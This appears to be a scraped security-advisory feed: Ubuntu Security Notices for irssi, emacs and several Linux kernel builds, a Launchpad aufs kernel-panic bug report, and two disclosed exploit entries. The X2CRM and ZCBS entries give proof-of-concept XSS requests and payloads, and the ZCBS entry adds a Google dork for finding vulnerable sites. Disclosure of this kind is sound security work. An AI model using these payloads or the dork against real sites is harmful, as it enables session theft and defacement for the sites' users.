Ubuntu Security Notice 6002-1 - It was discovered that Irssi incorrectly handled certain internal routines. An attacker could possibly use this issue to cause a crash.

    ==========================================================================Ubuntu Security Notice USN-6002-1April 10, 2023irssi vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.10Summary:Irssi could be made to crash in specific scenarios.Software Description:- irssi: terminal based IRC clientDetails:It was discovered that Irssi incorrectly handled certain internal routines.An attacker could possibly use this issue to cause a crash.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.10:  irssi                           1.4.2-1ubuntu1.1In general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-6002-1  CVE-2023-29132Package Information:  https://launchpad.net/ubuntu/+source/irssi/1.4.2-1ubuntu1.1

Ubuntu Security Notice USN-6002-1

Ubuntu Security Notice 6003-1 - Xi Lu discovered that Emacs did not properly handle certain inputs. An attacker could possibly use this issue to execute arbitrary commands.

    ==========================================================================Ubuntu Security Notice USN-6003-1April 06, 2023emacs24 vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 16.04 ESMSummary:Emacs could be made to run programs as your login if it received specially crafted input.Software Description:- emacs24: GNU Emacs editorDetails:Xi Lu discovered that Emacs did not properly handle certaininputs. An attacker could possibly use this issue to executearbitrary commands.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 16.04 ESM:   emacs24                                 24.5+1-6ubuntu1.1+esm3   emacs24-common                  24.5+1-6ubuntu1.1+esm3In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-6003-1   CVE-2023-28617

Ubuntu Security Notice USN-6003-1

X2CRM versions 6.6 and 6.9 suffer from multiple cross site scripting vulnerabilities.

    # Exploit Title: X2CRM v6.6/6.9 - Stored Cross-Site Scripting (XSS) (Authenticated)# Exploit Author: Betul Denizler# Vendor Homepage: https://x2crm.com/# Software Link: https://sourceforge.net/projects/x2engine/# Version: X2CRM v6.6/6.9# Tested on: Ubuntu Mate 20.04# Vulnerable Parameter: Actions[subject]# CVE: CVE-2022-48178# Date: 27.12.2022'''POC REQUEST:========POST /c2xrm/x2engine/index.php/actions/update?id=1 HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 172Origin: http://localhostConnection: closeReferer: http://localhost/c2xrm/x2engine/index.php/actions/viewAction?id=1Cookie: LoginForm[username]=admin; LoginForm[rememberMe]=1; PHPSESSID=kg3n7kcjqtm29fc7n4m72m0bt5; YII_CSRF_TOKEN=e5d14327e116fe92a5feb663d52e0920f1a4adab; 5d8630d289284e8c14d15b14f4b4dc28=779a63cb39d04cca59b4a3b9b2a4fad817930211a%3A4%3A%7Bi%3A0%3Bs%3A1%3A%224%22%3Bi%3A1%3Bs%3A5%3A%22test2%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A0%3A%7B%7D%7D; d9ee490d05f512911c1c4614c37db2b8=15982c76efa545e0e6fcd167baa86541c1ef91eda%3A4%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A0%3A%7B%7D%7D; sessionToken=Ncr7UIvK2yPvHzZc8koNW4DaIXxwZnsrSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originYII_CSRF_TOKEN=e5d14327e116fe92a5feb663d52e0920f1a4adab&Actions%5Bsubject%5D=%3Cscript%3Ealert(1)%3C%2Fscript%3E&Actions%5Bpriority%5D=1&Actions%5BactionDescription%5D=testEXPLOITATION========1. Create an action2. Inject payload to the vulnerable parameter in POST requestPayload: %3Cscript%3Ealert(1)%3C%2Fscript%3E'''# Exploit Title: X2CRM v6.6/6.9 - Reflected Cross-Site Scripting (XSS) (Authenticated)# Exploit Author: Betul Denizler# Vendor Homepage: https://x2crm.com/# Software Link: https://sourceforge.net/projects/x2engine/# Version: X2CRM v6.6/6.9# Tested on: Ubuntu Mate 20.04# Vulnerable Parameter: model# CVE: Use CVE-2022-48177# Date: 27.12.2022'''POC REQUEST:========GET /x2crm/x2engine/index.php/admin/importModels?model=asd%22%3E%3Cbody%20onload=%22alert(4)%22%3E HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeCookie: LoginForm[username]=admin; LoginForm[rememberMe]=1; PHPSESSID=959fpkms4abdhtresce9k9rmk3; YII_CSRF_TOKEN=e5d14327e116fe92a5feb663d52e0920f1a4adab; d9ee490d05f512911c1c4614c37db2b8=15982c76efa545e0e6fcd167baa86541c1ef91eda%3A4%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A0%3A%7B%7D%7D; locationTrackingFrequency=60; locationTrackingSwitch=1; 5d8630d289284e8c14d15b14f4b4dc28=15982c76efa545e0e6fcd167baa86541c1ef91eda%3A4%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A0%3A%7B%7D%7D; sessionToken=FFWkdliSAKgtUbP1dKP4iswyYRelqyQ4Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: noneSec-Fetch-User: ?1EXPLOITATION========1. Select Import Records Model in admin settings2. Inject payload to the vulnerable parameter in GET requestPayload: "><body onload="alert(4)">'''

X2CRM 6.6 / 6.9 Cross Site Scripting

ZCBS, ZBBS, and ZPBS version 4.14k suffer from a cross site scripting vulnerability.

Change Mirror Download

    # Exploit Title: ZCBS/ZBBS/ZPBS v4.14k - Reflected Cross-Site Scripting (XSS)# Date: 2023-03-30# CVE: CVE-2023-26692# Exploit Author: Abdulaziz Saad (@b4zb0z)# Vendor Homepage: https://www.zcbs.nl# Version: 4.14k# Tested on: LAMP, Ubuntu# Google Dork: inurl:objecten.pl?ident=3D---[#] Vulnerability :`$_GET['ident']`[#] Exploitation :`https://localhost/cgi-bin/objecten.pl?ident=3D%3Cimg%20src=3Dx%20onerror==3Dalert(%22XSS%22)%3E`

ZCBS / ZBBS / ZPBS 4.14k Cross Site Scripting

It was discovered that aufs improperly managed inode reference counts in the vfsub_dentry_open() method. A local attacker could use this vulnerability to cause a denial of service attack.

\[Impact\]

 \* Systems with aufs mounts are vulnerable to a kernel BUG(),  
   which can turn into a panic/crash if panic\_on\_oops is set.

 \* It is exploitable by unprivileged local users; and also  
   remote access operations (e.g., web server) potentially.

 \* This issue has also manifested in Kubernetes deployments  
   with a kernel panic in iptables-save or iptables-restore  
   after a few weeks of uptime, without user interaction.

 \* Usually all Kubernetes worker nodes hit the issue around  
   the same time.

\[Fix\]

 \* The issue is fixed with 2 patches in aufs4-linux.git:  
 - 515a586eeef3 aufs: do not call i\_readcount\_inc()  
 - f10aea57d39d aufs: bugfix, IMA i\_readcount

 \* The first addresses the issue, and the second addresses a  
   regression in the aufs feature to change RW branches to RO.

 \* The kernel v5.3 aufs patches had an equivalent fix to the  
   second patch, which is present in the Focal aufs patchset  
   (and on ubuntu-unstable/master & /master-5.8 on 20200629)

 - 1d26f910c53f aufs: for v5.3-rc1, maintain i\_readcount  
   (in aufs5-linux.git)

\[Test Case\]

 \* Repeatedly open/close the same file in read-only mode in  
   aufs (UINT\_MAX times, to overflow a signed int back to 0.)

 \* Alternatively, monitor the underlying filesystems's file  
   inode.i\_readcount over several open/close system calls.  
   (should not monotonically increase; rather, return to 0.)

\[Regression Potential\]

 \* This changes the core path that aufs opens files, so there  
   is a risk of regression; however, the fix changes aufs for  
   how other filesystems work, so this generally is OK to do.  
   In any case, most regressions would manifest in open() or  
   close() (where the VFS handles/checks inode.i\_readcount.)

 \* The aufs maintainer has access to an internal test-suite  
   used to validate aufs changes, used to identify the first  
   regression (in the branch RW/RO mode change), and then to  
   validate/publish the patches upstream; should be good now.

 \* This has also been tested with 'stress-ng --class filesystem'  
   and with 'xfstests -overlay' (patch to use aufs vs overlayfs)  
   on Xenial/Bionic/Focal (-proposed vs. -proposed + patches).  
   No regressions observed in stress-ng/xfstests log or dmesg.

\[Other Info\]

 \* Applied on Unstable (branches master and master-5.8)  
 \* Not required on Groovy (still 5.4; should sync from Unstable)  
 \* Required on LTS releases: Bionic and Focal and Xenial.  
 \* Required on other releases: Disco and Eoan (for custom kernels)

\[Original Bug Description\]

Problem Report:  
\--------------

An user reported several nodes in their Kubernetes clusters  
hit a kernel panic at about the same time, and periodically  
(usually 35 days of uptime, and in same order nodes booted.)

The kernel panics message/stack trace are consistent across  
nodes, in \_\_fput() by iptables-save/restore from kube-proxy.

Example:

"""  
\[3016161.866702\] kernel BUG at .../include/linux/fs.h:2583!  
\[3016161.866704\] invalid opcode: 0000 \[#1\] SMP  
...  
\[3016161.866780\] CPU: 40 PID: 33068 Comm: iptables-restor Tainted: P OE 4.4.0-133-generic #159-Ubuntu  
...  
\[3016161.866786\] RIP: 0010:\[...\] \[...\] \_\_fput+0x223/0x230  
...  
\[3016161.866818\] Call Trace:  
\[3016161.866823\] \[...\] \_\_\_\_fput+0xe/0x10  
\[3016161.866827\] \[...\] task\_work\_run+0x86/0xb0  
\[3016161.866831\] \[...\] exit\_to\_usermode\_loop+0xc2/0xd0  
\[3016161.866833\] \[...\] syscall\_return\_slowpath+0x4e/0x60  
\[3016161.866839\] \[...\] int\_ret\_from\_sys\_call+0x25/0x9f  
"""

(uptime: 3016161 seconds / (24\*60\*60) = 34.90 days)

They have provided a crashdump (privately available) used  
for analysis later in this bug report.

Note: the root cause turns out to be independent of K8s,  
as explained in the Root Cause section.

Related Report:  
\--------------

This behavior matches this public bug of another user:  
https://github.com/kubernetes/kubernetes/issues/70229

"""  
I have several machines happen kernel panic，and these  
machine have same dump trace like below:

KERNEL: /usr/lib/debug/boot/vmlinux-4.4.0-104-generic  
...  
PANIC: "kernel BUG at .../include/linux/fs.h:2582!"  
...  
COMMAND: "iptables-restor"  
...  
crash> bt  
...  
\[exception RIP: \_\_fput+541\]  
...  
#8 \[ffff880199f33e60\] \_\_fput at ffffffff812125ac  
#9 \[ffff880199f33ea8\] \_\_\_\_fput at ffffffff812126ee  
#10 \[ffff880199f33eb8\] task\_work\_run at ffffffff8109f101  
#11 \[ffff880199f33ef8\] exit\_to\_usermode\_loop at ffffffff81003242  
#12 \[ffff880199f33f30\] syscall\_return\_slowpath at ffffffff81003c6e  
#13 \[ffff880199f33f50\] int\_ret\_from\_sys\_call at ffffffff818449d0  
...

The above showed command "iptables-restor" cause the kernel  
panic and its pid is 16884，its parent process is kube-proxy.

Sometimes the process of kernel panic is "iptables-save" and  
the dump trace are same.

The kernel panic always happens every 26 days(machine uptime)  
"""

<< Adding further sections as comments to keep page short. >>

CVE-2020-11935: Bug #1873074 “kernel panic hit by kube-proxy iptables-save/resto...” : Bugs : linux package : Ubuntu

Ubuntu Security Notice 6001-1 - Xuewei Feng, Chuanpu Fu, Qi Li, Kun Sun, and Ke Xu discovered that the TCP implementation in the Linux kernel did not properly handle IPID assignment. A remote attacker could use this to cause a denial of service or inject forged data. Ke Sun, Alyssa Milburn, Henrique Kawakami, Emma Benoit, Igor Chervatyuk, Lisa Aichele, and Thais Moreira Hamasaki discovered that the Spectre Variant 2 mitigations for AMD processors on Linux were insufficient in some situations. A local attacker could possibly use this to expose sensitive information.

==========================================================================  
Ubuntu Security Notice USN-6001-1  
April 06, 2023

linux-aws vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 16.04 ESM

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-aws: Linux kernel for Amazon Web Services (AWS) systems

Details:

Xuewei Feng, Chuanpu Fu, Qi Li, Kun Sun, and Ke Xu discovered that the TCP  
implementation in the Linux kernel did not properly handle IPID assignment.  
A remote attacker could use this to cause a denial of service (connection  
termination) or inject forged data. (CVE-2020-36516)

Ke Sun, Alyssa Milburn, Henrique Kawakami, Emma Benoit, Igor Chervatyuk,  
Lisa Aichele, and Thais Moreira Hamasaki discovered that the Spectre  
Variant 2 mitigations for AMD processors on Linux were insufficient in some  
situations. A local attacker could possibly use this to expose sensitive  
information. (CVE-2021-26401)

Jürgen Groß discovered that the Xen subsystem within the Linux kernel did  
not adequately limit the number of events driver domains (unprivileged PV  
backends) could send to other guest VMs. An attacker in a driver domain  
could use this to cause a denial of service in other guest VMs.  
(CVE-2021-28711, CVE-2021-28712, CVE-2021-28713)

Wolfgang Frisch discovered that the ext4 file system implementation in the  
Linux kernel contained an integer overflow when handling metadata inode  
extents. An attacker could use this to construct a malicious ext4 file  
system image that, when mounted, could cause a denial of service (system  
crash). (CVE-2021-3428)

It was discovered that the IEEE 802.15.4 wireless network subsystem in the  
Linux kernel did not properly handle certain error conditions, leading to a  
null pointer dereference vulnerability. A local attacker could possibly use  
this to cause a denial of service (system crash). (CVE-2021-3659)

It was discovered that the System V IPC implementation in the Linux kernel  
did not properly handle large shared memory counts. A local attacker could  
use this to cause a denial of service (memory exhaustion). (CVE-2021-3669)

Alois Wohlschlager discovered that the overlay file system in the Linux  
kernel did not restrict private clones in some situations. An attacker  
could use this to expose sensitive information. (CVE-2021-3732)

It was discovered that the SCTP protocol implementation in the Linux kernel  
did not properly verify VTAGs in some situations. A remote attacker could  
possibly use this to cause a denial of service (connection disassociation).  
(CVE-2021-3772)

It was discovered that the btrfs file system implementation in the Linux  
kernel did not properly handle locking in certain error conditions. A local  
attacker could use this to cause a denial of service (kernel deadlock).  
(CVE-2021-4149)

Jann Horn discovered that the socket subsystem in the Linux kernel  
contained a race condition when handling listen() and connect() operations,  
leading to a read-after-free vulnerability. A local attacker could use this  
to cause a denial of service (system crash) or possibly expose sensitive  
information. (CVE-2021-4203)

It was discovered that the file system quotas implementation in the Linux  
kernel did not properly validate the quota block number. An attacker could  
use this to construct a malicious file system image that, when mounted and  
operated on, could cause a denial of service (system crash).  
(CVE-2021-45868)

Zhihua Yao discovered that the MOXART SD/MMC driver in the Linux kernel did  
not properly handle device removal, leading to a use-after-free  
vulnerability. A physically proximate attacker could possibly use this to  
cause a denial of service (system crash). (CVE-2022-0487)

It was discovered that the block layer subsystem in the Linux kernel did  
not properly initialize memory in some situations. A privileged local  
attacker could use this to expose sensitive information (kernel memory).  
(CVE-2022-0494)

It was discovered that the UDF file system implementation in the Linux  
kernel could attempt to dereference a null pointer in some situations. An  
attacker could use this to construct a malicious UDF image that, when  
mounted and operated on, could cause a denial of service (system crash).  
(CVE-2022-0617)

David Bouman discovered that the netfilter subsystem in the Linux kernel  
did not initialize memory in some situations. A local attacker could use  
this to expose sensitive information (kernel memory). (CVE-2022-1016)

It was discovered that the implementation of the 6pack and mkiss protocols  
in the Linux kernel did not handle detach events properly in some  
situations, leading to a use-after-free vulnerability. A local attacker  
could possibly use this to cause a denial of service (system crash).  
(CVE-2022-1195)

Duoming Zhou discovered race conditions in the AX.25 amateur radio protocol  
implementation in the Linux kernel, leading to use-after-free  
vulnerabilities. A local attacker could possibly use this to cause a denial  
of service (system crash). (CVE-2022-1205)

It was discovered that the tty subsystem in the Linux kernel contained a  
race condition in certain situations, leading to an out-of-bounds read  
vulnerability. A local attacker could possibly use this to cause a denial  
of service (system crash) or expose sensitive information. (CVE-2022-1462)

It was discovered that the implementation of X.25 network protocols in the  
Linux kernel did not terminate link layer sessions properly. A local  
attacker could possibly use this to cause a denial of service (system  
crash). (CVE-2022-1516)

Duoming Zhou discovered a race condition in the NFC subsystem in the Linux  
kernel, leading to a use-after-free vulnerability. A privileged local  
attacker could use this to cause a denial of service (system crash) or  
possibly execute arbitrary code. (CVE-2022-1974)

Duoming Zhou discovered that the NFC subsystem in the Linux kernel did not  
properly prevent context switches from occurring during certain atomic  
context operations. A privileged local attacker could use this to cause a  
denial of service (system crash). (CVE-2022-1975)

It was discovered that the HID subsystem in the Linux kernel did not  
properly validate inputs in certain conditions. A local attacker with  
physical access could plug in a specially crafted USB device to expose  
sensitive information. (CVE-2022-20132)

It was discovered that the device-mapper verity (dm-verity) driver in the  
Linux kernel did not properly verify targets being loaded into the device-  
mapper table. A privileged attacker could use this to cause a denial of  
service (system crash) or possibly execute arbitrary code. (CVE-2022-20572,  
CVE-2022-2503)

Duoming Zhou discovered that race conditions existed in the timer handling  
implementation of the Linux kernel's Rose X.25 protocol layer, resulting in  
use-after-free vulnerabilities. A local attacker could use this to cause a  
denial of service (system crash). (CVE-2022-2318)

Zheyu Ma discovered that the Silicon Motion SM712 framebuffer driver in the  
Linux kernel did not properly handle very small reads. A local attacker  
could use this to cause a denial of service (system crash). (CVE-2022-2380)

David Leadbeater discovered that the netfilter IRC protocol tracking  
implementation in the Linux Kernel incorrectly handled certain message  
payloads in some situations. A remote attacker could possibly use this to  
cause a denial of service or bypass firewall filtering. (CVE-2022-2663)

Lucas Leong discovered that the LightNVM subsystem in the Linux kernel did  
not properly handle data lengths in certain situations. A privileged  
attacker could use this to cause a denial of service (system crash) or  
possibly execute arbitrary code. (CVE-2022-2991)

It was discovered that the Intel 740 frame buffer driver in the Linux  
kernel contained a divide by zero vulnerability. A local attacker could use  
this to cause a denial of service (system crash). (CVE-2022-3061)

Jiasheng Jiang discovered that the wm8350 charger driver in the Linux  
kernel did not properly deallocate memory, leading to a null pointer  
dereference vulnerability. A local attacker could use this to cause a  
denial of service (system crash). (CVE-2022-3111)

It was discovered that the sound subsystem in the Linux kernel contained a  
race condition in some situations. A local attacker could use this to cause  
a denial of service (system crash). (CVE-2022-3303)

It was discovered that the Broadcom FullMAC USB WiFi driver in the Linux  
kernel did not properly perform bounds checking in some situations. A  
physically proximate attacker could use this to craft a malicious USB  
device that when inserted, could cause a denial of service (system crash)  
or possibly execute arbitrary code. (CVE-2022-3628)

Ziming Zhang discovered that the VMware Virtual GPU DRM driver in the Linux  
kernel contained an out-of-bounds write vulnerability. A local attacker  
could use this to cause a denial of service (system crash).  
(CVE-2022-36280)

It was discovered that the NILFS2 file system implementation in the Linux  
kernel did not properly deallocate memory in certain error conditions. An  
attacker could use this to cause a denial of service (memory exhaustion).  
(CVE-2022-3646)

It was discovered that the Netlink Transformation (XFRM) subsystem in the  
Linux kernel contained a reference counting error. A local attacker could  
use this to cause a denial of service (system crash). (CVE-2022-36879)

It was discovered that the infrared transceiver USB driver did not properly  
handle USB control messages. A local attacker with physical access could  
plug in a specially crafted USB device to cause a denial of service (memory  
exhaustion). (CVE-2022-3903)

Jann Horn discovered a race condition existed in the Linux kernel when  
unmapping VMAs in certain situations, resulting in possible use-after-free  
vulnerabilities. A local attacker could possibly use this to cause a denial  
of service (system crash) or execute arbitrary code. (CVE-2022-39188)

Hyunwoo Kim discovered that the DVB Core driver in the Linux kernel did not  
properly perform reference counting in some situations, leading to a use-  
after-free vulnerability. A local attacker could use this to cause a denial  
of service (system crash) or possibly execute arbitrary code.  
(CVE-2022-41218)

It was discovered that a race condition existed in the SMSC UFX USB driver  
implementation in the Linux kernel, leading to a use-after-free  
vulnerability. A physically proximate attacker could use this to cause a  
denial of service (system crash) or possibly execute arbitrary code.  
(CVE-2022-41849)

It was discovered that a race condition existed in the Roccat HID driver in  
the Linux kernel, leading to a use-after-free vulnerability. A local  
attacker could use this to cause a denial of service (system crash) or  
possibly execute arbitrary code. (CVE-2022-41850)

It was discovered that the USB core subsystem in the Linux kernel did not  
properly handle nested reset events. A local attacker with physical access  
could plug in a specially crafted USB device to cause a denial of service  
(kernel deadlock). (CVE-2022-4662)

It was discovered that the network queuing discipline implementation in the  
Linux kernel contained a null pointer dereference in some situations. A  
local attacker could use this to cause a denial of service (system crash).  
(CVE-2022-47929)

Kyle Zeng discovered that the IPv6 implementation in the Linux kernel  
contained a NULL pointer dereference vulnerability in certain situations. A  
local attacker could use this to cause a denial of service (system crash).  
(CVE-2023-0394)

It was discovered that a memory leak existed in the SCTP protocol  
implementation in the Linux kernel. A local attacker could use this to  
cause a denial of service (memory exhaustion). (CVE-2023-1074)

Mingi Cho discovered that the netfilter subsystem in the Linux kernel did  
not properly initialize a data structure, leading to a null pointer  
dereference vulnerability. An attacker could use this to cause a denial of  
service (system crash). (CVE-2023-1095)

Kyle Zeng discovered that the ATM VC queuing discipline implementation in  
the Linux kernel contained a type confusion vulnerability in some  
situations. An attacker could use this to cause a denial of service (system  
crash). (CVE-2023-23455)

Lianhui Tang discovered that the MPLS implementation in the Linux kernel  
did not properly handle certain sysctl allocation failure conditions,  
leading to a double-free vulnerability. An attacker could use this to cause  
a denial of service or possibly execute arbitrary code. (CVE-2023-26545)

It was discovered that the NTFS file system implementation in the Linux  
kernel did not properly validate attributes in certain situations, leading  
to an out-of-bounds read vulnerability. A local attacker could possibly use  
this to expose sensitive information (kernel memory). (CVE-2023-26607)

Duoming Zhou discovered that a race condition existed in the infrared  
receiver/transceiver driver in the Linux kernel, leading to a use-after-  
free vulnerability. A privileged attacker could use this to cause a denial  
of service (system crash) or possibly execute arbitrary code.  
(CVE-2023-1118)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 16.04 ESM:  
   linux-image-4.4.0-1155-aws      4.4.0-1155.170  
   linux-image-aws                 4.4.0.1155.159

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-6001-1  
   CVE-2020-36516, CVE-2021-26401, CVE-2021-28711, CVE-2021-28712,  
   CVE-2021-28713, CVE-2021-3428, CVE-2021-3659, CVE-2021-3669,  
   CVE-2021-3732, CVE-2021-3772, CVE-2021-4149, CVE-2021-4203,  
   CVE-2021-45868, CVE-2022-0487, CVE-2022-0494, CVE-2022-0617,  
   CVE-2022-1016, CVE-2022-1195, CVE-2022-1205, CVE-2022-1462,  
   CVE-2022-1516, CVE-2022-1974, CVE-2022-1975, CVE-2022-20132,  
   CVE-2022-20572, CVE-2022-2318, CVE-2022-2380, CVE-2022-2503,  
   CVE-2022-2663, CVE-2022-2991, CVE-2022-3061, CVE-2022-3111,  
   CVE-2022-3303, CVE-2022-3628, CVE-2022-36280, CVE-2022-3646,  
   CVE-2022-36879, CVE-2022-3903, CVE-2022-39188, CVE-2022-41218,  
   CVE-2022-41849, CVE-2022-41850, CVE-2022-4662, CVE-2022-47929,  
   CVE-2023-0394, CVE-2023-1074, CVE-2023-1095, CVE-2023-1118,  
   CVE-2023-23455, CVE-2023-26545, CVE-2023-26607

Ubuntu Security Notice USN-6001-1

Ubuntu Security Notice 6000-1 - It was discovered that the Upper Level Protocol subsystem in the Linux kernel did not properly handle sockets entering the LISTEN state in certain protocols, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. It was discovered that the NVMe driver in the Linux kernel did not properly handle reset events in some situations. A local attacker could use this to cause a denial of service.

==========================================================================  
Ubuntu Security Notice USN-6000-1  
April 05, 2023

linux-bluefield vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 20.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-bluefield: Linux kernel for NVIDIA BlueField platforms

Details:

It was discovered that the Upper Level Protocol (ULP) subsystem in the  
Linux kernel did not properly handle sockets entering the LISTEN state in  
certain protocols, leading to a use-after-free vulnerability. A local  
attacker could use this to cause a denial of service (system crash) or  
possibly execute arbitrary code. (CVE-2023-0461)

It was discovered that the NVMe driver in the Linux kernel did not properly  
handle reset events in some situations. A local attacker could use this to  
cause a denial of service (system crash). (CVE-2022-3169)

It was discovered that a use-after-free vulnerability existed in the SGI  
GRU driver in the Linux kernel. A local attacker could possibly use this to  
cause a denial of service (system crash) or possibly execute arbitrary  
code. (CVE-2022-3424)

Gwangun Jung discovered a race condition in the IPv4 implementation in the  
Linux kernel when deleting multipath routes, resulting in an out-of-bounds  
read. An attacker could use this to cause a denial of service (system  
crash) or possibly expose sensitive information (kernel memory).  
(CVE-2022-3435)

It was discovered that a race condition existed in the Kernel Connection  
Multiplexor (KCM) socket implementation in the Linux kernel when releasing  
sockets in certain situations. A local attacker could use this to cause a  
denial of service (system crash). (CVE-2022-3521)

It was discovered that the Netronome Ethernet driver in the Linux kernel  
contained a use-after-free vulnerability. A local attacker could use this  
to cause a denial of service (system crash) or possibly execute arbitrary  
code. (CVE-2022-3545)

It was discovered that the hugetlb implementation in the Linux kernel  
contained a race condition in some situations. A local attacker could use  
this to cause a denial of service (system crash) or expose sensitive  
information (kernel memory). (CVE-2022-3623)

Ziming Zhang discovered that the VMware Virtual GPU DRM driver in the Linux  
kernel contained an out-of-bounds write vulnerability. A local attacker  
could use this to cause a denial of service (system crash).  
(CVE-2022-36280)

Hyunwoo Kim discovered that the DVB Core driver in the Linux kernel did not  
properly perform reference counting in some situations, leading to a use-  
after-free vulnerability. A local attacker could use this to cause a denial  
of service (system crash) or possibly execute arbitrary code.  
(CVE-2022-41218)

It was discovered that the Intel i915 graphics driver in the Linux kernel  
did not perform a GPU TLB flush in some situations. A local attacker could  
use this to cause a denial of service or possibly execute arbitrary code.  
(CVE-2022-4139)

It was discovered that a race condition existed in the Xen network backend  
driver in the Linux kernel when handling dropped packets in certain  
circumstances. An attacker could use this to cause a denial of service  
(kernel deadlock). (CVE-2022-42328, CVE-2022-42329)

It was discovered that the Atmel WILC1000 driver in the Linux kernel did  
not properly validate offsets, leading to an out-of-bounds read  
vulnerability. An attacker could use this to cause a denial of service  
(system crash). (CVE-2022-47520)

It was discovered that the network queuing discipline implementation in the  
Linux kernel contained a null pointer dereference in some situations. A  
local attacker could use this to cause a denial of service (system crash).  
(CVE-2022-47929)

José Oliveira and Rodrigo Branco discovered that the prctl syscall  
implementation in the Linux kernel did not properly protect against  
indirect branch prediction attacks in some situations. A local attacker  
could possibly use this to expose sensitive information. (CVE-2023-0045)

It was discovered that a use-after-free vulnerability existed in the  
Advanced Linux Sound Architecture (ALSA) subsystem. A local attacker could  
use this to cause a denial of service (system crash). (CVE-2023-0266)

Kyle Zeng discovered that the IPv6 implementation in the Linux kernel  
contained a NULL pointer dereference vulnerability in certain situations. A  
local attacker could use this to cause a denial of service (system crash).  
(CVE-2023-0394)

Wei Chen discovered that a race condition existed in the TIPC protocol  
implementation in the Linux kernel, leading to a null pointer dereference  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash). (CVE-2023-1382)

It was discovered that the Android Binder IPC subsystem in the Linux kernel  
did not properly validate inputs in some situations, leading to a use-  
after-free vulnerability. A local attacker could use this to cause a denial  
of service (system crash) or possibly execute arbitrary code.  
(CVE-2023-20938)

Kyle Zeng discovered that the class-based queuing discipline implementation  
in the Linux kernel contained a type confusion vulnerability in some  
situations. An attacker could use this to cause a denial of service (system  
crash). (CVE-2023-23454)

Kyle Zeng discovered that the ATM VC queuing discipline implementation in  
the Linux kernel contained a type confusion vulnerability in some  
situations. An attacker could use this to cause a denial of service (system  
crash). (CVE-2023-23455)

It was discovered that the NTFS file system implementation in the Linux  
kernel did not properly validate attributes in certain situations, leading  
to an out-of-bounds read vulnerability. A local attacker could possibly use  
this to expose sensitive information (kernel memory). (CVE-2023-26607)

Wei Chen discovered that the DVB USB AZ6027 driver in the Linux kernel  
contained a null pointer dereference when handling certain messages from  
user space. A local attacker could use this to cause a denial of service  
(system crash). (CVE-2023-28328)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 20.04 LTS:  
   linux-image-5.4.0-1059-bluefield  5.4.0-1059.65  
   linux-image-bluefield           5.4.0.1059.54

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-6000-1  
   CVE-2022-3169, CVE-2022-3424, CVE-2022-3435, CVE-2022-3521,  
   CVE-2022-3545, CVE-2022-3623, CVE-2022-36280, CVE-2022-41218,  
   CVE-2022-4139, CVE-2022-42328, CVE-2022-42329, CVE-2022-47520,  
   CVE-2022-47929, CVE-2023-0045, CVE-2023-0266, CVE-2023-0394,  
   CVE-2023-0461, CVE-2023-1382, CVE-2023-20938, CVE-2023-23454,  
   CVE-2023-23455, CVE-2023-26607, CVE-2023-28328

Package Information:  
   https://launchpad.net/ubuntu/+source/linux-bluefield/5.4.0-1059.65

Ubuntu Security Notice USN-6000-1

Ubuntu Security Notice 5996-1 - It was discovered that Liblouis incorrectly handled certain files. An attacker could possibly use this issue to cause a denial of service.

